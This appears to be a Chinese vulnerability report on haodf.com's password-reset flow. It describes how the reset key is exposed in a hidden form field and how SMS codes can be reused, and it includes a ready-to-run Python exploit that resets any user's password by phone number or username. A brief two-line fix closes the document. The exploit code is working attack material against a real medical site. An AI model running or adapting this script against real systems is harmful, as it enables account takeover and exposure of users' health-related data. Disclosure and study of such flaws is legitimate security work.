1、通过手机号重置
http://passport.haodf.com/user/resetpassword

通过此网址，可用邮箱或手机号找回密码
当我们选择手机号找密码时，网页跳转到如下地址，要求输入用户名和手机验证码
http://passport.haodf.com/user/sendpasswordsucc?type=mobile&username=xxxxxxx

可以看出，这时用户名会直接出现在网页地址栏内，且验证码可以绕过
（BTW，手机验证码可以反复使用， 似乎在很长一段时间内都不会过期）
查看网页源代码，找到

< input name="key" type="hidden" id="key" value="DE4rXvQaMCGXBC3UMxQRXXXXXXXXNCEnO8iGq8jhOf0b" / >

这个key就是用来重置密码的key

然后构造一个post请求，地址为
http://passport.haodf.com/user/confirmpassword

数据为
password=123123&confirmPassword=123123&key=XXXXXX

即可重置该用户密码

2、通过用户名重置
网址本身没用提供此功能， 但可以从上面的中间网址进入，即可通过用户名重置
http://passport.haodf.com/user/sendpasswordsucc?type=mobile&username=xxxxxxx

3、通过邮箱重置
类似1中通过手机号重置


附一个python写的简单EXP
#encoding=utf8
username = 'init'

class MyHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
    def http_error_302(self, req, fp, code, msg, httpmsg):
        for header in httpmsg.headers:       
            if header.count('username=') > 0:
                global username
                username = header[header.index('username=')+9: header.index('\r\n')]
        return urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, httpmsg)

import urllib, urllib2, ConfigParser, time, winsound

def ResetByPhone(phone):
    resetpwd_url = 'http://passport.haodf.com/user/resetpassword'
    submit_url = 'http://passport.haodf.com/user/confirmpassword'

    req = urllib2.Request(resetpwd_url, 'input=%s' % phone)
    opener = urllib2.build_opener(MyHTTPRedirectHandler)
    response = opener.open(req)
    the_page = response.read()
    key = the_page[ the_page.index('id="key"')+16 : ]
    key = key[: key.index('"')]

    req = urllib2.Request(submit_url, 'password=%s&confirmPassword=%s&key=%s' % (phone,phone,key))
    response = urllib2.urlopen(req)
    #print response.read()

def ResetByUsername(uname):
    resetpwd_url = 'http://passport.haodf.com/user/sendpasswordsucc'
    submit_url = 'http://passport.haodf.com/user/confirmpassword'

    req = urllib2.Request(resetpwd_url, 'type=mobile&username=%s' % uname)
    response = urllib2.urlopen(req)
    the_page = response.read()
    key = the_page[ the_page.index('id="key"')+16 : ]
    key = key[: key.index('"')]

    req = urllib2.Request(submit_url, 'password=%s&confirmPassword=%s&key=%s' % (uname,uname,key))
    response = urllib2.urlopen(req)
    #print response.read()

ResetByPhone('13912341234')
ResetByUsername('testuser')

 

 
 

修复方案：
把key隐藏
设置验证码失效机制